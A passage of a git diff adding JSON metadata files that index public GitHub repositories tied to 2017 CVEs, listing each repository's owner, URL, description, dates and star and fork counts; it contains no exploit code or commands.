28194115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28194115?v=4", + "html_url": "https:\/\/github.com\/rfcl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rfcl\/Synology-DiskStation-User-Enumeration-CVE-2017-9554-", + "description": "Tiny script to enumerate users using CVE-2017-9554 (forget_passwd.cgi) ", + "fork": false, + "created_at": "2018-08-28T05:13:59Z", + "updated_at": "2024-08-02T06:02:52Z", + "pushed_at": "2018-08-28T05:19:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 374951296, + "name": "CVE-2017-9554-Exploit-Tool", + "full_name": "Ez0-yf\/CVE-2017-9554-Exploit-Tool", + "owner": { + "login": "Ez0-yf", + "id": 78433033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78433033?v=4", + "html_url": "https:\/\/github.com\/Ez0-yf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ez0-yf\/CVE-2017-9554-Exploit-Tool", + "description": "CVE-2017-9554 Exploit Tool", + "fork": false, + "created_at": "2021-06-08T09:13:52Z", + "updated_at": "2021-06-08T09:28:22Z", + "pushed_at": "2021-06-08T09:28:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9606.json b/2017/CVE-2017-9606.json new file mode 100644 index 0000000000..f88429ab7f --- /dev/null +++ b/2017/CVE-2017-9606.json @@ -0,0 +1,33 @@ +[ + { + "id": 94288997, + "name": "CVE-2017-9606", + "full_name": "Houl777\/CVE-2017-9606", + "owner": { + "login": "Houl777", + "id": 29420363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29420363?v=4", + "html_url": "https:\/\/github.com\/Houl777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Houl777\/CVE-2017-9606", + "description": null, + "fork": false, + "created_at": "2017-06-14T04:30:36Z", + "updated_at": "2017-06-14T04:30:36Z", + "pushed_at": "2017-06-14T08:15:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9608.json b/2017/CVE-2017-9608.json new file mode 100644 index 0000000000..51c24d3cff --- /dev/null +++ b/2017/CVE-2017-9608.json @@ -0,0 +1,33 @@ +[ + { + "id": 578866492, + "name": "practice-22-23", + "full_name": "LaCinquette\/practice-22-23", + "owner": { + "login": "LaCinquette", + "id": 21091551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21091551?v=4", + "html_url": "https:\/\/github.com\/LaCinquette", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LaCinquette\/practice-22-23", + "description": "CVE-2017-9608 analysis", + "fork": false, + "created_at": "2022-12-16T04:13:11Z", + "updated_at": "2022-12-17T12:30:01Z", + "pushed_at": "2022-12-19T06:26:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9609.json b/2017/CVE-2017-9609.json new file mode 100644 index 0000000000..00f35ecc87 --- /dev/null +++ b/2017/CVE-2017-9609.json @@ -0,0 +1,33 @@ +[ + { + "id": 94987347, + "name": "Blackcat-cms-v1.2-xss-POC-by-Provensec-llc", + "full_name": "faizzaidi\/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc", + "owner": { + "login": "faizzaidi", + "id": 12153050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12153050?v=4", + "html_url": "https:\/\/github.com\/faizzaidi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faizzaidi\/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc", + "description": "BlackCat-CMS-Bundle-v1.2 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2017-9609", + "fork": false, + "created_at": "2017-06-21T09:30:58Z", + "updated_at": "2020-07-17T05:22:42Z", + "pushed_at": "2017-06-21T09:31:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9627.json b/2017/CVE-2017-9627.json new file mode 100644 index 0000000000..175a47f8e7 --- /dev/null +++ b/2017/CVE-2017-9627.json @@ -0,0 +1,33 @@ +[ + { + "id": 355839204, + "name": "aaLogger", + "full_name": "USSCltd\/aaLogger", + "owner": { + "login": "USSCltd", + "id": 19225769, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19225769?v=4", + "html_url": "https:\/\/github.com\/USSCltd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/USSCltd\/aaLogger", + "description": "CVE-2017-9627 CVE-2017-9629 CVE-2017-9631", + "fork": false, + "created_at": "2021-04-08T09:16:47Z", + "updated_at": "2021-09-24T08:56:05Z", + "pushed_at": "2021-04-08T09:20:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9757.json b/2017/CVE-2017-9757.json new file mode 100644 index 0000000000..d22ffe9518 --- /dev/null +++ b/2017/CVE-2017-9757.json @@ -0,0 +1,33 @@ +[ + { + "id": 779505014, + "name": "CVE-2017-9757", + "full_name": "peterleiva\/CVE-2017-9757", + "owner": { + "login": "peterleiva", + "id": 85527528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85527528?v=4", + "html_url": "https:\/\/github.com\/peterleiva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/peterleiva\/CVE-2017-9757", + "description": "SyncBreeze exploit for CVE-2017-9757", + "fork": false, + "created_at": "2024-03-30T02:06:15Z", + "updated_at": "2024-03-30T10:54:08Z", + "pushed_at": "2024-03-30T03:53:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9769.json b/2017/CVE-2017-9769.json new file mode 100644 index 0000000000..6ab4659382 --- /dev/null +++ b/2017/CVE-2017-9769.json @@ -0,0 +1,35 @@ +[ + { + "id": 309657694, + "name": "CVE-2017-9769", + "full_name": "kkent030315\/CVE-2017-9769", + "owner": { + "login": "kkent030315", + "id": 37926134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37926134?v=4", + "html_url": "https:\/\/github.com\/kkent030315", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkent030315\/CVE-2017-9769", + "description": "A specially crafted IOCTL can be issued to the rzpnk.sys driver in Razer Synapse 2.20.15.1104 that is forwarded to ZwOpenProcess allowing a handle to be opened to an arbitrary process.", + "fork": false, + "created_at": "2020-11-03T10:58:53Z", + "updated_at": "2024-08-12T20:07:20Z", + "pushed_at": "2020-11-08T21:43:18Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-9769" + ], + "visibility": "public", + "forks": 8, + "watchers": 12, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9779.json b/2017/CVE-2017-9779.json new file mode 100644 index 0000000000..c271348821 --- /dev/null +++ b/2017/CVE-2017-9779.json @@ -0,0 +1,41 @@ +[ + { + "id": 100739963, + "name": "CVE-2017-9779", + "full_name": "homjxi0e\/CVE-2017-9779", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-9779", + "description": "Automatic execution Payload From Windows By Path Users All Exploit Via File bashrc ", + "fork": false, + "created_at": "2017-08-18T18:30:42Z", + "updated_at": "2017-09-11T14:35:42Z", + "pushed_at": "2017-09-11T23:28:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automatic", + "bashrc", + "by", + "cmder", + "exploit", + "implementation", + "via" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9791.json b/2017/CVE-2017-9791.json new file mode 100644 index 0000000000..ecf925e636 --- /dev/null +++ b/2017/CVE-2017-9791.json @@ -0,0 +1,95 @@ +[ + { + "id": 96536969, + "name": "s2-048", + "full_name": "IanSmith123\/s2-048", + "owner": { + "login": "IanSmith123", + "id": 19611084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19611084?v=4", + "html_url": "https:\/\/github.com\/IanSmith123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IanSmith123\/s2-048", + "description": "Apache struts struts 2 048, CVE-2017-9791.", + "fork": false, + "created_at": "2017-07-07T12:35:55Z", + "updated_at": "2017-07-07T14:05:07Z", + "pushed_at": "2017-07-07T17:10:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 96565902, + "name": "Struts2-048", + "full_name": "dragoneeg\/Struts2-048", + "owner": { + "login": "dragoneeg", + "id": 4232461, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4232461?v=4", + "html_url": "https:\/\/github.com\/dragoneeg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dragoneeg\/Struts2-048", + "description": "CVE-2017-9791", + "fork": false, + "created_at": "2017-07-07T18:27:31Z", + "updated_at": "2024-01-09T13:16:09Z", + "pushed_at": "2017-07-08T02:08:36Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 104592299, + "name": "CVE-2017-9791", + "full_name": "xfer0\/CVE-2017-9791", + "owner": { + "login": "xfer0", + "id": 30201498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30201498?v=4", + "html_url": "https:\/\/github.com\/xfer0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xfer0\/CVE-2017-9791", + "description": "Metasploit module for Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2017-09-23T19:08:31Z", + "updated_at": "2019-05-02T18:56:11Z", + "pushed_at": "2019-05-02T18:56:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9798.json b/2017/CVE-2017-9798.json new file mode 100644 index 0000000000..5242eddfdf --- /dev/null +++ b/2017/CVE-2017-9798.json @@ -0,0 +1,132 @@ +[ + { + "id": 103955890, + "name": "CVE-2017-9798", + "full_name": "nitrado\/CVE-2017-9798", + "owner": { + "login": "nitrado", + "id": 3217095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3217095?v=4", + "html_url": "https:\/\/github.com\/nitrado", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitrado\/CVE-2017-9798", + "description": "Checks a shared hosting environment for CVE-2017-9798", + "fork": false, + "created_at": "2017-09-18T15:17:13Z", + "updated_at": "2023-01-28T00:04:34Z", + "pushed_at": "2017-09-18T15:38:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 104254696, + "name": "optionsbleed", + "full_name": "pabloec20\/optionsbleed", + "owner": { + "login": "pabloec20", + "id": 24191742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24191742?v=4", + "html_url": "https:\/\/github.com\/pabloec20", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pabloec20\/optionsbleed", + "description": "CVE-2017-9798", + "fork": false, + "created_at": "2017-09-20T18:44:17Z", + "updated_at": "2020-11-23T17:31:10Z", + "pushed_at": "2017-09-20T18:45:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 104625015, + "name": "CVE-2017-9798", + "full_name": "l0n3rs\/CVE-2017-9798", + "owner": { + "login": "l0n3rs", + "id": 31120718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31120718?v=4", + "html_url": "https:\/\/github.com\/l0n3rs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3rs\/CVE-2017-9798", + "description": null, + "fork": false, + "created_at": "2017-09-24T06:51:32Z", + "updated_at": "2017-09-24T06:52:51Z", + "pushed_at": "2017-09-24T06:54:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 104967629, + "name": "OptionsBleed-POC-Scanner", + "full_name": "brokensound77\/OptionsBleed-POC-Scanner", + "owner": { + "login": "brokensound77", + "id": 16747370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16747370?v=4", + "html_url": "https:\/\/github.com\/brokensound77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brokensound77\/OptionsBleed-POC-Scanner", + "description": "OptionsBleed (CVE-2017-9798) PoC \/ Scanner", + "fork": false, + "created_at": "2017-09-27T03:28:22Z", + "updated_at": "2024-10-18T20:52:29Z", + "pushed_at": "2024-05-21T05:25:02Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve-2017-9798", + "optionsbleed", + "poc", + "scanner" + ], + "visibility": "public", + "forks": 4, + "watchers": 19, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-9805.json b/2017/CVE-2017-9805.json new file mode 100644 index 0000000000..0d4f79cba1 --- /dev/null +++ b/2017/CVE-2017-9805.json @@ -0,0 +1,507 @@ +[ + { + "id": 102583828, + "name": "struts-rce-cve-2017-9805", + "full_name": "luc10\/struts-rce-cve-2017-9805", + "owner": { + "login": "luc10", + "id": 7849730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7849730?v=4", + "html_url": "https:\/\/github.com\/luc10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luc10\/struts-rce-cve-2017-9805", + "description": "CVE 2017-9805", + "fork": false, + "created_at": "2017-09-06T08:32:01Z", + "updated_at": "2024-08-12T19:32:25Z", + "pushed_at": "2020-08-31T04:34:29Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 59, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 102714061, + "name": "struts2-rce-cve-2017-9805-ruby", + "full_name": "hahwul\/struts2-rce-cve-2017-9805-ruby", + "owner": { + "login": "hahwul", + "id": 13212227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13212227?v=4", + "html_url": "https:\/\/github.com\/hahwul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hahwul\/struts2-rce-cve-2017-9805-ruby", + "description": "cve -2017-9805", + "fork": false, + "created_at": "2017-09-07T08:49:14Z", + "updated_at": "2024-01-11T07:41:07Z", + "pushed_at": "2017-09-07T08:55:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve--2017-9805" + ], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 102917821, + "name": "struts-pwn_CVE-2017-9805", + "full_name": "mazen160\/struts-pwn_CVE-2017-9805", + "owner": { + "login": "mazen160", + "id": 8996052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8996052?v=4", + "html_url": "https:\/\/github.com\/mazen160", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mazen160\/struts-pwn_CVE-2017-9805", + "description": "An exploit for Apache Struts CVE-2017-9805", + "fork": false, + "created_at": "2017-09-09T01:32:57Z", + "updated_at": "2024-10-16T07:20:46Z", + "pushed_at": "2017-11-07T19:24:00Z", + "stargazers_count": 249, + "watchers_count": 249, + "has_discussions": false, + "forks_count": 69, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "struts-pwn" + ], + "visibility": "public", + "forks": 69, + "watchers": 249, + "score": 0, + "subscribers_count": 17 + }, + { + "id": 103005989, + "name": "apache-struts-pwn_CVE-2017-9805", + "full_name": "Lone-Ranger\/apache-struts-pwn_CVE-2017-9805", + "owner": { + "login": "Lone-Ranger", + "id": 15882470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15882470?v=4", + "html_url": "https:\/\/github.com\/Lone-Ranger", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lone-Ranger\/apache-struts-pwn_CVE-2017-9805", + "description": "An exploit for Apache Struts CVE-2017-9805", + "fork": false, + "created_at": "2017-09-10T05:26:03Z", + "updated_at": "2024-08-12T19:32:30Z", + "pushed_at": "2017-09-10T05:28:03Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 111928630, + "name": "-CVE-2017-9805", + "full_name": "0x00-0x00\/-CVE-2017-9805", + "owner": { + "login": "0x00-0x00", + "id": 23364530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23364530?v=4", + "html_url": "https:\/\/github.com\/0x00-0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x00-0x00\/-CVE-2017-9805", + "description": "Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)", + "fork": false, + "created_at": "2017-11-24T14:46:35Z", + "updated_at": "2024-08-12T19:34:18Z", + "pushed_at": "2020-11-26T18:35:29Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "exploit", + "struts" + ], + "visibility": "public", + "forks": 12, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 112276528, + "name": "S2-052", + "full_name": "BeyondCy\/S2-052", + "owner": { + "login": "BeyondCy", + "id": 4694785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4694785?v=4", + "html_url": "https:\/\/github.com\/BeyondCy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BeyondCy\/S2-052", + "description": "CVE-2017-9805 - Exploit", + "fork": false, + "created_at": "2017-11-28T02:46:07Z", + "updated_at": "2020-11-24T14:16:12Z", + "pushed_at": "2017-10-20T21:04:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 113078841, + "name": "cve-2017-9805.py", + "full_name": "chrisjd20\/cve-2017-9805.py", + "owner": { + "login": "chrisjd20", + "id": 11812223, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11812223?v=4", + "html_url": "https:\/\/github.com\/chrisjd20", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chrisjd20\/cve-2017-9805.py", + "description": "Better Exploit Code For CVE 2017 9805 apache struts", + "fork": false, + "created_at": "2017-12-04T18:23:53Z", + "updated_at": "2024-08-12T19:34:32Z", + "pushed_at": "2017-12-23T14:07:59Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 21, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 205600969, + "name": "struts_rest_rce_fuzz-CVE-2017-9805-", + "full_name": "UbuntuStrike\/struts_rest_rce_fuzz-CVE-2017-9805-", + "owner": { + "login": "UbuntuStrike", + "id": 30779753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30779753?v=4", + "html_url": "https:\/\/github.com\/UbuntuStrike", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UbuntuStrike\/struts_rest_rce_fuzz-CVE-2017-9805-", + "description": "Simple python script to fuzz site for CVE-2017-9805", + "fork": false, + "created_at": "2019-08-31T22:06:31Z", + "updated_at": "2019-08-31T23:36:02Z", + "pushed_at": "2019-08-31T23:36:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 205945238, + "name": "CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit", + "full_name": "UbuntuStrike\/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit", + "owner": { + "login": "UbuntuStrike", + "id": 30779753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30779753?v=4", + "html_url": "https:\/\/github.com\/UbuntuStrike", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UbuntuStrike\/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit", + "description": "A script to Fuzz and and exploit Apache struts CVE-2017-9805", + "fork": false, + "created_at": "2019-09-02T22:24:07Z", + "updated_at": "2020-06-18T02:43:56Z", + "pushed_at": "2019-09-02T22:36:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263410855, + "name": "CVE-2017-9805---Documentation---IT19143378", + "full_name": "AvishkaSenadheera\/CVE-2017-9805---Documentation---IT19143378", + "owner": { + "login": "AvishkaSenadheera", + "id": 48066295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48066295?v=4", + "html_url": "https:\/\/github.com\/AvishkaSenadheera", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AvishkaSenadheera\/CVE-2017-9805---Documentation---IT19143378", + "description": null, + "fork": false, + "created_at": "2020-05-12T17:53:57Z", + "updated_at": "2020-05-12T18:15:38Z", + "pushed_at": "2020-05-12T18:15:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 271482237, + "name": "CVE-2017-9805-Exploit", + "full_name": "wifido\/CVE-2017-9805-Exploit", + "owner": { + "login": "wifido", + "id": 16313853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16313853?v=4", + "html_url": "https:\/\/github.com\/wifido", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wifido\/CVE-2017-9805-Exploit", + "description": "Struts 2.5 - 2.5.12 REST Plugin XStream RCE", + "fork": false, + "created_at": "2020-06-11T07:36:56Z", + "updated_at": "2021-04-04T04:33:56Z", + "pushed_at": "2020-05-17T13:37:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 312564506, + "name": "apache-struts-cve-2017-9805", + "full_name": "rvermeulen\/apache-struts-cve-2017-9805", + "owner": { + "login": "rvermeulen", + "id": 636626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/636626?v=4", + "html_url": "https:\/\/github.com\/rvermeulen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvermeulen\/apache-struts-cve-2017-9805", + "description": null, + "fork": false, + "created_at": "2020-11-13T12:04:32Z", + "updated_at": "2020-11-13T12:12:37Z", + "pushed_at": "2020-11-13T12:07:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 316623697, + "name": "-CVE-2017-9805-", + "full_name": "jongmartinez\/-CVE-2017-9805-", + "owner": { + "login": "jongmartinez", + "id": 11743460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11743460?v=4", + "html_url": "https:\/\/github.com\/jongmartinez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jongmartinez\/-CVE-2017-9805-", + "description": "Exploit script for Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805) ", + "fork": false, + "created_at": "2020-11-28T00:00:37Z", + "updated_at": "2022-06-16T02:49:48Z", + "pushed_at": "2020-11-28T00:34:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 344944105, + "name": "CVE-2017-9805", + "full_name": "z3bd\/CVE-2017-9805", + "owner": { + "login": "z3bd", + "id": 79710562, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79710562?v=4", + "html_url": "https:\/\/github.com\/z3bd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3bd\/CVE-2017-9805", + "description": "struts2-rest-showcase 2.5.10", + "fork": false, + "created_at": "2021-03-05T21:57:11Z", + "updated_at": "2021-03-05T23:26:32Z", + "pushed_at": "2021-03-05T23:26:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 354456108, + "name": "CVE-2017-9805-Exploit", + "full_name": "0xd3vil\/CVE-2017-9805-Exploit", + "owner": { + "login": "0xd3vil", + "id": 32324065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32324065?v=4", + "html_url": "https:\/\/github.com\/0xd3vil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xd3vil\/CVE-2017-9805-Exploit", + "description": "CVE-2017-9805-Exploit", + "fork": false, + "created_at": "2021-04-04T04:35:19Z", + "updated_at": "2024-08-12T20:11:49Z", + "pushed_at": "2021-04-04T04:35:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 544634552, + "name": "CVE-2017-9805", + "full_name": "Shakun8\/CVE-2017-9805", + "owner": { + "login": "Shakun8", + "id": 87657631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87657631?v=4", + "html_url": "https:\/\/github.com\/Shakun8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shakun8\/CVE-2017-9805", + "description": "CVE-2017-9805 POC", + "fork": false, + "created_at": 